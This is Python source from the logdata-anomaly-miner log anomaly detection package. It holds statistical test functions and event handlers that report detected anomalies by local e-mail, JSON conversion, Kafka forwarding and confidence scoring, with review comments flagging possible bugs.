        raise ValueError('The sample must contain at least two observations.')
    if vals.ndim > 1:
        raise ValueError('The sample must be one-dimensional.')
    n = len(vals)
    cdfvals = cdf(vals, *args)
    sum_val = 0
    # Sum of squared distances between the empirical and the theoretical cdf at the sorted sample points.
    for i in range(n):
        sum_val += ((2*i+1)/(2*n)-cdfvals[i])**2
    return 1/(12*n) + sum_val


def cramervonmises2(rvs1, rvs2):
    """
    Return the cramer von mises two sample homogeneity test statistic.

    @param rvs1 first one-dimensional sample.
    @param rvs2 second one-dimensional sample.
    @raise ValueError if either sample has fewer than two observations or more than one dimension.
    """
    vals1 = np.sort(np.asarray(rvs1))
    vals2 = np.sort(np.asarray(rvs2))
    if vals1.size <= 1 or vals2.size <= 1:
        raise ValueError('The sample must contain at least two observations.')
    if vals1.ndim > 1 or vals2.ndim > 1:
        raise ValueError('The sample must be one-dimensional.')
    n1 = len(vals1)
    n2 = len(vals2)
    sum_val = 0
    index1 = 0
    index2 = 0
    # Merge the two sorted samples: i is the 0-based rank in the pooled sample, index1/index2 the rank within the own
    # sample, so (i - index) is the rank displacement that enters the statistic.
    for i in range(n1+n2):
        # NOTE(review): once index2 points at the last element of vals2, the remaining vals1 entries are consumed first
        # regardless of their value, so that last vals2 element always gets the highest pooled rank — confirm intended.
        if index1 < n1 and (index2 == n2-1 or vals1[index1] < vals2[index2]):
            sum_val += n1*(i-index1)**2
            index1 += 1
        else:
            sum_val += n2*(i-index2)**2
            index2 += 1
    # NOTE(review): the textbook two-sample statistic (and scipy's cramervonmises_2samp) subtracts (4*n1*n2-1)/(6*(n1+n2));
    # the '1*n1*n2' here shifts the result by a constant for given sample sizes — confirm it is intended.
    return sum_val/(n1*n2*(n1+n2)) - (1*n1*n2-1)/(6*(n1+n2))


def durbin_watson(rvs):
    """
    Return the durbin watson test statistic.

    Sum of squared successive differences divided by the sum of squares. An empty or all-zero sequence raises
    ZeroDivisionError; there is no guard here.
    """
    return sum((rvs[i+1] - rvs[i])**2 for i in range(len(rvs) - 1)) / sum(rvs[i]**2 for i in range(len(rvs)))
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events/000077500000000000000000000000001437606560100305135ustar00rootroot00000000000000DefaultMailNotificationEventHandler.py000066400000000000000000000223241437606560100400470ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""
This module defines the event handler for reporting via emails.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
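"""
import shlex
import time
import re
from smtplib import SMTP, SMTPException
import logging
import sys
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.events.EventData import EventData

# Mail template: header block, empty separator line, body. The separator line is what makes the MTA treat the collected
# event text as body rather than as further headers.
_message_str = """From: %s
To: %s
Subject: %s

%s
"""


class DefaultMailNotificationEventHandler(EventHandlerInterface, TimeTriggeredComponentInterface):
    """
    This class implements an event record listener.

    It will pool received events, reduce the amount of events below the maximum number allowed per timeframe, create text
    representation of received events and send them via SMTP to the local mail transport (127.0.0.1:25).
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME
    CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress'
    CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress'
    CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix'
    CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime'
    CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime'
    CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap'
    CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap'
    CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage'

    def __init__(self, analysis_context):
        """
        Initialize the event handler.

        @param analysis_context used to get the aminer config and the config_properties.
        @raise Exception if MailAlerting.TargetAddress is not configured, or if either address fails the e-mail syntax check.
        """
        self.analysis_context = analysis_context
        aminer_config = analysis_context.aminer_config
        # @see https://emailregex.com/
        is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$")
        recipient_address = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS)
        # Check the raw config value: shlex.quote(None) returns "''", which made this check unreachable and turned a missing
        # target address into the less specific "must be email addresses" error below.
        if recipient_address is None:
            msg = 'Cannot create e-mail notification listener without target address'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        sender_address = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS)
        # Both addresses go into the SMTP envelope and the From:/To: headers. fullmatch() is used because '$' alone also
        # matches before a trailing newline, which would let a line break into the header block.
        if not isinstance(recipient_address, str) or not isinstance(sender_address, str) or \
                not is_email.fullmatch(recipient_address) or not is_email.fullmatch(sender_address):
            msg = 'MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # Addresses that pass the pattern contain only characters shlex.quote() leaves untouched, so the stored values are
        # identical to what the earlier shlex.quote() calls produced; the quoting is simply no longer needed here.
        self.recipient_address = recipient_address
        self.sender_address = sender_address
        # The prefix lands in the Subject header; it comes from the operator's configuration, not from log data. Note that
        # shlex.quote() wraps a prefix containing spaces (including the default) in single quotes, which show up in the mail.
        self.subject_prefix = shlex.quote(
            aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_SUBJECT_PREFIX, 'aminer Alerts:'))
        self.alert_grace_time_end = aminer_config.config_properties.get(
            DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_ALERT_GRACE_TIME, 0)
        self.event_collect_time = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_EVENT_COLLECT_TIME, 10)
        self.min_alert_gap = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MIN_GAP, 600)
        self.max_alert_gap = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MAX_GAP, 600)
        self.max_events_per_message = aminer_config.config_properties.get(
            DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, 1000)
        # A positive grace time is configured as a duration and converted here to an absolute end time.
        if self.alert_grace_time_end > 0:
            self.alert_grace_time_end += time.time()
        self.events_collected = 0
        self.event_collection_start_time = 0
        self.last_alert_time = 0
        self.next_alert_time = 0
        self.current_alert_gap = self.min_alert_gap
        self.current_message = ''

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log
        messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the event_type.
        @param log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        """
        # Respect an explicit handler allowlist on the detector, if it has one.
        if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \
                event_source.output_event_handlers:
            return
        # Drop everything until the configured grace period after start-up has passed.
        if self.alert_grace_time_end != 0:
            if self.alert_grace_time_end >= time.time():
                return
            self.alert_grace_time_end = 0
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return
        # Avoid too many calls to the operating system time()
        current_time = time.time()
        # Once max_events_per_message is reached, further events are not appended (and not counted) until the next send.
        if self.events_collected < self.max_events_per_message:
            if self.events_collected == 0:
                self.event_collection_start_time = current_time
            self.events_collected += 1
            event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source,
                                       self.analysis_context)
            self.current_message += event_data_obj.receive_event_string()
        if self.next_alert_time == 0:
            if self.last_alert_time != 0:
                # This is the first event received after sending of a previous notification. If the currentAlertGap has not elapsed,
                # increase the gap immediately.
                self.next_alert_time = self.last_alert_time + self.current_alert_gap
                if self.next_alert_time < current_time:
                    # We are already out of the required gap.
                    self.current_alert_gap = self.min_alert_gap
                    self.last_alert_time = 0
                    self.next_alert_time = current_time + self.event_collect_time
                else:
                    # Increase the gap
                    self.current_alert_gap *= 1.5
                    if self.current_alert_gap > self.max_alert_gap:
                        self.current_alert_gap = self.max_alert_gap
            else:
                # No relevant last alert time recorded, just use default.
                self.next_alert_time = current_time + self.event_collect_time
        if (self.next_alert_time != 0) and (current_time >= self.next_alert_time):
            self.send_notification(current_time)

    def do_timer(self, trigger_time):
        """
        Send the collected events when the scheduled alert time has been reached.

        @param trigger_time the time the timer fired.
        @return 10 (presumably the delay in seconds until the next timer call, per TimeTriggeredComponentInterface — confirm).
        """
        if (self.next_alert_time != 0) and (trigger_time >= self.next_alert_time):
            self.send_notification(trigger_time)
        return 10

    def send_notification(self, trigger_time):
        """
        Really send out the message.

        Builds the mail from _message_str and hands it to the local SMTP server; the method body continues in the next span.
        """
        if self.events_collected == 0:
            return
        subject_text = f'{self.subject_prefix} Collected Events'
        if self.last_alert_time != 0:
            subject_text += f' in the last {trigger_time - self.last_alert_time} seconds'
        message = _message_str % (self.sender_address, self.recipient_address, subject_text, self.current_message)
        try:
            # timeout explicitly needs to be set None, because in python version < 3.7 socket.settimeout() sets the socket type
            # SOCK_NONBLOCKING and the code fails.
            # NOTE(review): the SMTP(...) call that follows passes timeout=5, which contradicts the comment above — confirm
            # which of the two is current.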
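# … continuation of DefaultMailNotificationEventHandler.send_notification (its try: block opens in the preceding span) …
            smtp_obj = SMTP('127.0.0.1', port=25, timeout=5)
            smtp_obj.sendmail(self.sender_address, self.recipient_address, message)
            smtp_obj.quit()
        except (SMTPException, OSError) as e:
            # OSError is needed as well: a refused or timed-out connection to the local MTA is raised by SMTP() itself and is
            # not an SMTPException, so without it a missing mail daemon would propagate out of the analysis loop.
            print(e, file=sys.stderr)
            logging.getLogger(DEBUG_LOG_NAME).error(e)
        # The collected events are discarded whether or not the mail went out; the failure is only logged above.
        self.last_alert_time = trigger_time
        self.events_collected = 0
        self.current_message = ''
        self.next_alert_time = 0
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent notification.", self.__class__.__name__)
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events/EventData.py000066400000000000000000000076511437606560100327470ustar00rootroot00000000000000# skipcq: FLK-D400
"""
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import time
from datetime import datetime
from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX
from aminer import AminerConfig


class EventData:
    """This class is used to create a string for different event handlers."""

    def __init__(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source, analysis_context):
        """
        Receive information about a detected event.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log
        messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the event_type.
        @param log_atom the log atom which produced the event; may be None, in which case no log_atom attribute is set.
        @param event_source reference to detector generating the event.
        @param analysis_context the analysis context used to get the component; may be None.
        """
        self.event_type = event_type
        self.event_message = event_message
        self.sorted_log_lines = sorted_loglines
        self.event_data = event_data
        self.event_source = event_source
        self.analysis_context = analysis_context
        if analysis_context is not None:
            self.description = f'"{analysis_context.get_name_by_component(event_source)}"'
        else:
            self.description = ""
        # The attribute is only created when a log atom exists; receive_event_string() tests for it with hasattr().
        if log_atom is None:
            return
        self.log_atom = log_atom

    def receive_event_string(self):
        """
        Build the text representation of the event.

        With an event message the first line is '<timestamp> <message>' (timestamp only when a log atom is present, a missing atom
        timestamp is set to now) followed by a line naming the event source, and the log lines are indented; without an event
        message the log lines are emitted unindented and the trailing newline is removed.
        @return the assembled string.
        """
        message = ""
        if self.event_message is not None:
            indent = " "
            if hasattr(self, "log_atom"):
                if self.log_atom.get_timestamp() is None:
                    self.log_atom.set_timestamp(time.time())
                message += f"{datetime.fromtimestamp(self.log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} "
                message += f"{self.event_message}\n"
                message += f"{self.event_source.__class__.__name__}: {self.description} ({len(self.sorted_log_lines)} lines)\n"
            else:
                message += f"{self.event_message} ({len(self.sorted_log_lines)} lines)\n"
        else:
            indent = ""
        for line in self.sorted_log_lines:
            if isinstance(line, bytes):  # skipcq: PTC-W0048
                if line != b"":
                    message += indent + self._decode_line(line) + "\n"
            else:
                # Lines that already start with the configured log line prefix are passed through unindented.
                original_log_line_prefix = None
                if self.analysis_context is not None:
                    # __init__ accepts analysis_context=None; without this guard a str line would raise AttributeError here.
                    original_log_line_prefix = self.analysis_context.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX)
                if original_log_line_prefix is not None and line.startswith(original_log_line_prefix):
                    message += line + "\n"
                elif line != "":
                    message += indent + line + "\n"
        if self.event_message is None:
            # remove last newline
            message = message[:-1]
        return message

    @staticmethod
    def _decode_line(line):
        """
        Decode a raw log line in the configured encoding.

        Falls back to repr() for byte sequences that are not valid in AminerConfig.ENCODING, matching how the detectors treat
        undecodable raw data, so that a malformed input line cannot abort event reporting.
        """
        try:
            return line.decode(AminerConfig.ENCODING)
        except UnicodeError:
            return repr(line)
EventInterfaces.py000066400000000000000000000064551437606560100341050ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""
This file contains the interface definitions implemented by classes in this directory and used by code outside this directory.

All classes are defined in separate files, only the namespace references are added here to simplify the code.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import abc


class EventHandlerInterface(metaclass=abc.ABCMeta):
    """
    This is the common interface of all components that can be notified on significant log data mining events.

    To avoid interference with the analysis process, the listener may only perform fast actions within the call. Longer running tasks
    have to be performed asynchronously.
    """

    @abc.abstractmethod
    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log
        messages.
        @param event_message the first output line of the event.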
@param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ class EventSourceInterface(metaclass=abc.ABCMeta): """ This is the common interface of all event sources. Component not implementing this interface may still emit events without support for callbacks. """ @abc.abstractmethod def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws NotImplementedError if this source does not support allowlisting per se @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ @staticmethod def get_weight_analysis_field_path(): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" return [] @staticmethod def get_weight_output_field_path(): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" return [] JsonConverterHandler.py000066400000000000000000000152131437606560100351070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that converts an event to JSON. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
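"""This module defines an event handler that converts an event to JSON.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import json
import time
import copy

from aminer.events.EventInterfaces import EventHandlerInterface
from aminer import AminerConfig


class JsonConverterHandler(EventHandlerInterface):
    """This class implements an event record listener, that will convert event data to JSON format."""

    def __init__(self, json_event_handlers, analysis_context, pretty_print=True):
        """
        Initialize the event handler.

        @param json_event_handlers the event handlers to which the json converted data is sent.
        @param analysis_context the analysis context used to get the component.
        @param pretty_print if true, the json is printed pretty; otherwise the json is printed with less space needed.
        """
        self.json_event_handlers = json_event_handlers
        self.analysis_context = analysis_context
        self.pretty_print = pretty_print

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event, enrich it with LogData/AnalysisComponent fields and forward it as JSON.

        @param event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data type-specific event data object (a dict, or None for input-layer events), should not be used unless listener
        really knows about the event_type.
        @param log_atom the log atom which produced the event; may be None for input-layer events.
        @param event_source reference to detector generating the event.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is not None and self not in handlers:
            return
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return
        # Input-layer sources (e.g. ByteStreamLineAtomizer.dispatch_event) emit events with event_data None; treat that as an
        # empty record instead of failing on the membership test below.
        if event_data is None:
            event_data = {}
        if 'StatusInfo' in event_data:
            # No anomaly; do nothing on purpose
            return
        log_data = self._build_log_data(sorted_loglines, log_atom, event_source)
        analysis_component = self._build_analysis_component(event_message, event_data, event_source)
        if 'LogData' not in event_data:
            event_data['LogData'] = log_data
        event_data['AnalysisComponent'] = analysis_component
        if self.pretty_print:
            json_data = json.dumps(event_data, indent=2)
        else:
            json_data = json.dumps(event_data)
        # Downstream handlers expect one entry per log line with the JSON document in the first slot.
        res = [''] * max(len(sorted_loglines), 1)
        res[0] = str(json_data)
        for listener in self.json_event_handlers:
            event_source = self._source_visible_to(event_source, listener)
            listener.receive_event(event_type, None, res, json_data, log_atom, event_source)

    def _build_log_data(self, sorted_loglines, log_atom, event_source):
        """
        Collect the raw log line, timestamps and (optionally) the annotated match elements for the LogData field.

        @param sorted_loglines the log lines of the event, used as fallback when no log atom is available.
        @param log_atom the log atom which produced the event or None.
        @param event_source the detector; its output_logline attribute enables the AnnotatedMatchElement output.
        @return a dict with the keys RawLogData, Timestamps, DetectionTimestamp, LogLinesCount and maybe AnnotatedMatchElement.
        """
        log_data = {}
        if log_atom is None:
            # Callers without an atom pass the raw line in sorted_loglines instead.
            raw_data = sorted_loglines[0] if sorted_loglines else b''
        else:
            raw_data = log_atom.raw_data
        log_data['RawLogData'] = [self._decode(raw_data)]
        if log_atom is not None:
            if log_atom.get_timestamp() is None:
                # Stamp the atom with the detection time so that Timestamps never stays empty.
                log_atom.set_timestamp(time.time())
            log_data['Timestamps'] = [round(log_atom.atom_time, 2)]
        else:
            log_data['Timestamps'] = []
        log_data['DetectionTimestamp'] = round(time.time(), 2)
        log_data['LogLinesCount'] = len(sorted_loglines)
        if log_atom is not None and log_atom.parser_match is not None and getattr(event_source, 'output_logline', False):
            annotated = {}
            for path, match in log_atom.parser_match.get_match_dictionary().items():
                if isinstance(match, list):
                    # Repeated elements are keyed by their position below the path.
                    for match_element_id, match_element in enumerate(match):
                        annotated[f'{path}/{match_element_id}'] = self._decode(match_element.match_object)
                else:
                    annotated[path] = self._decode(match.match_object)
            log_data['AnnotatedMatchElement'] = annotated
        return log_data

    def _build_analysis_component(self, event_message, event_data, event_source):
        """
        Build the AnalysisComponent description of the detector that emitted the event.

        Fields derived here take precedence over same-named keys of a detector-supplied AnalysisComponent dict in event_data.
        """
        analysis_component = {'AnalysisComponentIdentifier': self.analysis_context.get_id_by_component(event_source)}
        class_name = event_source.__class__.__name__
        if class_name == 'ExtractedData_class':
            analysis_component['AnalysisComponentType'] = 'DistributionDetector'
        else:
            analysis_component['AnalysisComponentType'] = str(class_name)
        analysis_component['AnalysisComponentName'] = self.analysis_context.get_name_by_component(event_source)
        analysis_component['Message'] = event_message
        if hasattr(event_source, 'persistence_id'):
            analysis_component['PersistenceFileName'] = event_source.persistence_id
        if hasattr(event_source, 'learn_mode'):
            analysis_component['TrainingMode'] = event_source.learn_mode
        detector_analysis_component = event_data.get('AnalysisComponent')
        if detector_analysis_component is not None:
            for key, value in detector_analysis_component.items():
                analysis_component.setdefault(key, value)
        return analysis_component

    @staticmethod
    def _decode(value):
        """Return value as text: bytes are decoded with the configured encoding, undecodable bytes fall back to repr()."""
        if isinstance(value, bytes):
            try:
                return value.decode(AminerConfig.ENCODING)
            except UnicodeError:
                return repr(value)
        return str(value)

    @staticmethod
    def _source_visible_to(event_source, listener):
        """
        Return event_source, or a copy whose output_event_handlers additionally lists listener.

        copy.copy() is shallow, so appending to the copied reference would silently extend the detector's own list and
        enable listener for all of its future events; the copy therefore gets its own list.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is None or listener in handlers:
            return event_source
        event_source = copy.copy(event_source)
        event_source.output_event_handlers = list(handlers) + [listener]
        return event_source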
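"""
This module defines an event handler that forwards Json-objects to Kafka.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import sys
import logging

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.events.EventInterfaces import EventHandlerInterface


class KafkaEventHandler(EventHandlerInterface):
    """This class implements an event record listener, that will forward Json-objects to a Kafka queue."""

    def __init__(self, analysis_context, topic, options):
        """
        Initialize the event handler.

        @param analysis_context the analysis context used to get the component.
        @param topic the Kafka topic to which the data is sent.
        @param options Kafka specific options, passed as keyword arguments to KafkaProducer.
        """
        self.analysis_context = analysis_context
        self.options = options
        self.topic = topic
        self.producer = None
        self.kafka_imported = False
        # Exception class of the kafka package; bound together with the producer in _ensure_producer so that the
        # send path can catch it on every call, not only on the call that performed the import.
        self.kafka_error = None

    def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source):
        """
        Receive information about a detected event in json format and publish it to the configured topic.

        @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret
        type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages.
        @param _event_message the first output line of the event.
        @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time
        of the event. The list has to contain at least one line.
        @param event_data the serialized event (str or bytes); anything else is rejected.
        @param _log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        @return True when the event was skipped or handed to the producer, False on a missing module or a send error.
        """
        handlers = getattr(event_source, 'output_event_handlers', None)
        if handlers is not None and self not in handlers:
            return True
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return True
        if not self._ensure_producer():
            return False
        if not isinstance(event_data, (str, bytes)):
            msg = 'KafkaEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first.'
            logging.getLogger(DEBUG_LOG_NAME).warning(msg)
            print('WARNING: ' + msg, file=sys.stderr)
            return False
        try:
            self.producer.send(self.topic, event_data)
        except self.kafka_error as err:
            self._report_error(err)
            self.producer.close()
            self.producer = None
            # Force re-creation on the next event instead of calling send() on None.
            self.kafka_imported = False
            return False
        return True

    def _ensure_producer(self):
        """
        Import the kafka package and create the producer on first use.

        @return True when a producer is available, False when the module is missing or the producer could not be created.
        """
        if self.kafka_imported:
            return True
        try:
            from kafka import KafkaProducer  # skipcq: PYL-C0415
            from kafka.errors import KafkaError  # skipcq: PYL-C0415
        except ImportError:
            msg = 'Kafka module not found.'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            print('ERROR: ' + msg, file=sys.stderr)
            return False
        self.kafka_error = KafkaError
        try:
            self.producer = KafkaProducer(**self.options, value_serializer=self._serialize)
        except KafkaError as err:
            # E.g. no broker reachable; report it like a send failure and retry on the next event.
            self._report_error(err)
            self.producer = None
            return False
        self.kafka_imported = True
        return True

    @staticmethod
    def _serialize(value):
        """Serialize the event payload: bytes pass through, str is encoded (both are admitted by receive_event)."""
        if isinstance(value, bytes):
            return value
        return value.encode()

    @staticmethod
    def _report_error(err):
        """Log a Kafka error to the debug log and stderr."""
        msg = str(err)
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        print("Error: " + msg, file=sys.stderr)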
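"""
This module defines an event handler that adds a confidence score to the anomaly output.
The score is calculated through analysis of a list of strings defined in the detector through the function get_weight_analysis_field_path
and weights the single strings based on the weights dictionary. The weights can optionally be automatically calculated.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import copy

from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.events.EventInterfaces import EventSourceInterface


class ScoringEventHandler(EventHandlerInterface):
    """This class implements an event record listener, that will add a confidence score to the anomaly output."""

    # Weight of a value that is neither listed in weights nor automatically weighted.
    DEFAULT_WEIGHT = 0.5
    # Scale of the automatic weight formula AUTO_WEIGHT_SCALE / (AUTO_WEIGHT_SCALE + number of value appearances).
    AUTO_WEIGHT_SCALE = 10

    def __init__(self, event_handlers, analysis_context, weights=None, auto_weights=False, auto_weights_history_length=1000):
        """
        Initialize the ScoringEventHandler component.

        @param event_handlers the event handlers the scored event is forwarded to.
        @param analysis_context the analysis context this handler is registered with.
        @param weights A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list
        and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if
        not automatically weighted.
        @param auto_weights boolean value that states if the weights should be automatically calculated through the formula
        10 / (10 + number of value appearances).
        @param auto_weights_history_length integer value that specifies the number of values that are considered in the calculation
        of the weights.
        """
        self.analysis_context = analysis_context
        self.event_handlers = event_handlers
        self.weights = weights
        self.auto_weights = auto_weights
        self.auto_weights_history_length = auto_weights_history_length
        if self.auto_weights:
            # Ring buffer of the most recent analysis lists; history_list_index is the next slot to overwrite.
            self.history_list = [[] for _ in range(self.auto_weights_history_length)]
            self.history_list_index = 0

    def receive_event(self, event_type, event_message, sorted_log_lines, event_data, log_atom, event_source):
        """
        Receive information about a detected event, add the confidence score when the detector declares where to find and
        store it, and forward the event to the following handlers.
        """
        analysis_field_path = []
        output_field_path = []
        if isinstance(event_source, EventSourceInterface):
            analysis_field_path = event_source.get_weight_analysis_field_path()
            output_field_path = event_source.get_weight_output_field_path()
        analysis_list = self._resolve_analysis_list(event_data, analysis_field_path)
        if analysis_list is not None:
            if output_field_path:
                self._add_confidence(event_data, output_field_path, analysis_list)
            if self.auto_weights:
                self._remember(analysis_list)
        for listener in self.event_handlers:
            event_source = self._source_visible_to(event_source, listener)
            listener.receive_event(event_type, event_message, sorted_log_lines, event_data, log_atom, event_source)

    @staticmethod
    def _resolve_analysis_list(event_data, analysis_field_path):
        """
        Follow analysis_field_path through event_data.

        @return the list found at the end of the path, or None when the path is empty, event_data does not have the expected
        nested-dict shape, or the field is not a list-like container.
        """
        if not analysis_field_path:
            return None
        node = event_data
        for key in analysis_field_path:
            # Every intermediate step has to be a dict holding the next key (event_data may also be None for input-layer events).
            if not isinstance(node, dict) or key not in node:
                return None
            node = node[key]
        if not isinstance(node, (list, tuple, set)):
            return None
        return node

    def _add_confidence(self, event_data, output_field_path, analysis_list):
        """
        Store the absolute and mean confidence of analysis_list at output_field_path inside event_data.

        Missing intermediate dicts are created; an existing non-dict value on the path aborts the scoring rather than
        overwriting detector output.
        """
        node = event_data
        for key in output_field_path[:-1]:
            if key not in node:
                node[key] = {}
            node = node[key]
            if not isinstance(node, dict):
                return
        confidence_absolut = sum(self.get_weight(val) for val in analysis_list)
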